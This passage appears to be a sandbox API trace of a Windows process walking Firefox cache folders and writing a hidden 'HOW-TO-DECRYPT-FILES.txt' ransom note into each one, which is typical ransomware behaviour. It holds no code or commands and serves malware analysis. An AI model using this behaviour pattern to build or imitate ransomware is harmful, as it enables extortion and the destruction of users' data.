[0049.258] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.258] GetLastError () returned 0x12 [0049.258] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.258] GetLastError () returned 0x12 [0049.258] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.258] GetLastError () returned 0x12 [0049.258] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.258] GetLastError () returned 0x12 [0049.258] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.259] GetLastError () returned 0x12 [0049.259] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.259] GetLastError () returned 0x12 [0049.259] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.259] SetErrorMode (uMode=0x0) returned 0x1 [0049.259] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03", lpFilePart=0x0) returned 0x53 [0049.259] GetLastError () returned 0x12 [0049.259] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.259] GetLastError () returned 0x12 [0049.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.259] GetLastError () returned 0x12 [0049.259] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03", lpFilePart=0x0) returned 0x53 [0049.259] GetLastError () returned 0x12 [0049.259] SetErrorMode (uMode=0x1) returned 0x0 [0049.259] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.260] GetLastError () returned 0x12 [0049.260] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.260] GetLastError () returned 0x12 [0049.260] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.260] GetLastError () returned 0x12 [0049.260] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.260] GetLastError () returned 0x12 [0049.260] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.260] SetErrorMode (uMode=0x0) returned 0x1 [0049.260] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03", lpFilePart=0x0) returned 0x53 [0049.260] GetLastError () returned 0x12 [0049.260] SetErrorMode (uMode=0x1) returned 0x0 [0049.260] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.260] GetLastError () returned 0x12 [0049.260] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.260] GetLastError () returned 0x12 [0049.260] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.260] GetLastError () returned 0x12 [0049.260] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.260] GetLastError () returned 0x12 [0049.261] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.261] SetErrorMode (uMode=0x0) returned 0x1 [0049.261] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03\\3E20Ad01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03\\3E20Ad01", lpFilePart=0x0) returned 0x5c [0049.261] GetLastError () returned 0x12 [0049.261] SetErrorMode (uMode=0x1) returned 0x0 [0049.261] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03\\3E20Ad01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\1\\03\\3e20ad01"), fInfoLevelId=0x0, lpFileInformation=0x1b7d78c | out: lpFileInformation=0x1b7d78c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4791f10, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4791f10, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4791f10, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x13c06)) returned 1 [0049.261] GetLastError () returned 0x12 [0049.261] SetErrorMode (uMode=0x0) returned 0x1 [0049.261] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.261] GetLastError () returned 0x12 [0049.261] SetErrorMode (uMode=0x1) returned 0x0 [0049.261] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\1\\03\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.262] GetLastError () returned 0x0 [0049.262] GetFileType (hFile=0x184) returned 0x1 [0049.262] SetErrorMode (uMode=0x0) returned 0x1 [0049.262] GetFileType (hFile=0x184) returned 0x1 [0049.262] WriteFile (in: hFile=0x184, lpBuffer=0x1b9935c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b9935c*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.263] GetLastError () returned 0x0 [0049.263] CloseHandle (hObject=0x184) returned 1 [0049.263] GetLastError () returned 0x0 [0049.263] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.263] GetLastError () returned 0x0 [0049.263] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\03\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.263] GetLastError () returned 0x0 [0049.263] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2", lpFilePart=0x0) returned 0x53 [0049.263] GetLastError () returned 0x0 [0049.263] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.263] GetLastError () returned 0x0 [0049.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.263] GetLastError () returned 0x0 [0049.263] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2", lpFilePart=0x0) returned 0x53 [0049.263] GetLastError () returned 0x0 [0049.263] SetErrorMode (uMode=0x1) returned 0x0 [0049.264] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.264] GetLastError () returned 0x0 [0049.264] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.264] GetLastError () returned 0x0 [0049.264] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.264] GetLastError () returned 0x0 [0049.264] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.264] GetLastError () returned 0x12 [0049.264] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.264] SetErrorMode (uMode=0x0) returned 0x1 [0049.264] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2", lpFilePart=0x0) returned 0x53 [0049.264] GetLastError () returned 0x12 [0049.265] SetErrorMode (uMode=0x1) returned 0x0 [0049.265] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.265] GetLastError () returned 0x12 [0049.265] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.265] GetLastError () returned 0x12 [0049.265] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.265] GetLastError () returned 0x12 [0049.265] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.265] GetLastError () returned 0x12 [0049.265] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.265] SetErrorMode (uMode=0x0) returned 0x1 [0049.265] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2\\0B619d01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2\\0B619d01", lpFilePart=0x0) returned 0x5c [0049.265] GetLastError () returned 0x12 [0049.265] SetErrorMode (uMode=0x1) returned 0x0 [0049.265] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\1\\c2\\0b619d01"), fInfoLevelId=0x0, lpFileInformation=0x1b9c94c | out: lpFileInformation=0x1b9c94c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7317f750, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x7317f750, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x731f1b70, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0xaa05)) returned 1 [0049.265] GetLastError () returned 0x12 [0049.265] SetErrorMode (uMode=0x0) returned 0x1 [0049.266] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.266] GetLastError () returned 0x12 [0049.266] SetErrorMode (uMode=0x1) returned 0x0 [0049.266] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\1\\c2\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.266] GetLastError () returned 0x0 [0049.266] GetFileType (hFile=0x184) returned 0x1 [0049.266] SetErrorMode (uMode=0x0) returned 0x1 [0049.266] GetFileType (hFile=0x184) returned 0x1 [0049.266] WriteFile (in: hFile=0x184, lpBuffer=0x1bb851c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1bb851c*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.267] GetLastError () returned 0x0 [0049.267] CloseHandle (hObject=0x184) returned 1 [0049.267] GetLastError () returned 0x0 [0049.267] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.267] GetLastError () returned 0x0 [0049.267] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\C2\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.267] GetLastError () returned 0x0 [0049.267] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6", lpFilePart=0x0) returned 0x53 [0049.267] GetLastError () returned 0x0 [0049.267] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.267] GetLastError () returned 0x0 [0049.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.267] GetLastError () returned 0x0 [0049.268] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6", lpFilePart=0x0) returned 0x53 [0049.268] GetLastError () returned 0x0 [0049.268] SetErrorMode (uMode=0x1) returned 0x0 [0049.268] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.268] GetLastError () returned 0x0 [0049.268] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.268] GetLastError () returned 0x0 [0049.268] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.268] GetLastError () returned 0x0 [0049.268] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.268] GetLastError () returned 0x12 [0049.268] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.269] SetErrorMode (uMode=0x0) returned 0x1 [0049.269] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6", lpFilePart=0x0) returned 0x53 [0049.269] GetLastError () returned 0x12 [0049.269] SetErrorMode (uMode=0x1) returned 0x0 [0049.269] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.269] GetLastError () returned 0x12 [0049.269] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.269] GetLastError () returned 0x12 [0049.269] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.269] GetLastError () returned 0x12 [0049.269] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.269] GetLastError () returned 0x12 [0049.269] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.269] SetErrorMode (uMode=0x0) returned 0x1 [0049.269] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6\\CBD4Dd01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6\\CBD4Dd01", lpFilePart=0x0) returned 0x5c [0049.269] GetLastError () returned 0x12 [0049.269] SetErrorMode (uMode=0x1) returned 0x0 [0049.269] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\1\\f6\\cbd4dd01"), fInfoLevelId=0x0, lpFileInformation=0x1bbbb0c | out: lpFileInformation=0x1bbbb0c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88adf640, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x88adf640, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x88b2b900, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xa60b)) returned 1 [0049.269] GetLastError () returned 0x12 [0049.269] SetErrorMode (uMode=0x0) returned 0x1 [0049.270] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.270] GetLastError () returned 0x12 [0049.270] SetErrorMode (uMode=0x1) returned 0x0 [0049.270] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\1\\f6\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.270] GetLastError () returned 0x0 [0049.270] GetFileType (hFile=0x184) returned 0x1 [0049.270] SetErrorMode (uMode=0x0) returned 0x1 [0049.270] GetFileType (hFile=0x184) returned 0x1 [0049.270] WriteFile (in: hFile=0x184, lpBuffer=0x1bd75ec*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1bd75ec*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.271] GetLastError () returned 0x0 [0049.271] CloseHandle (hObject=0x184) returned 1 [0049.272] GetLastError () returned 0x0 [0049.272] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.272] GetLastError () returned 0x0 [0049.272] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\1\\F6\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.272] GetLastError () returned 0x0 [0049.272] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2", nBufferLength=0x105, lpBuffer=0x18e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2", lpFilePart=0x0) returned 0x50 [0049.272] GetLastError () returned 0x0 [0049.272] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.272] GetLastError () returned 0x0 [0049.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.272] GetLastError () returned 0x0 [0049.272] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2", lpFilePart=0x0) returned 0x50 [0049.272] GetLastError () returned 0x0 [0049.272] SetErrorMode (uMode=0x1) returned 0x0 [0049.272] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.273] GetLastError () returned 0x0 [0049.273] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.273] GetLastError () returned 0x0 [0049.273] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.273] GetLastError () returned 0x0 [0049.273] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.273] GetLastError () returned 0x12 [0049.273] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.273] SetErrorMode (uMode=0x0) returned 0x1 [0049.273] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2", lpFilePart=0x0) returned 0x50 [0049.273] GetLastError () returned 0x12 [0049.273] SetErrorMode (uMode=0x1) returned 0x0 [0049.273] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.273] GetLastError () returned 0x12 [0049.273] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.273] GetLastError () returned 0x12 [0049.273] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.273] GetLastError () returned 0x12 [0049.273] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.273] GetLastError () returned 0x12 [0049.274] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.274] SetErrorMode (uMode=0x0) returned 0x1 [0049.274] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36", lpFilePart=0x0) returned 0x53 [0049.274] GetLastError () returned 0x12 [0049.274] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.274] GetLastError () returned 0x12 [0049.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.274] GetLastError () returned 0x12 [0049.274] GetFullPathNameW (in: 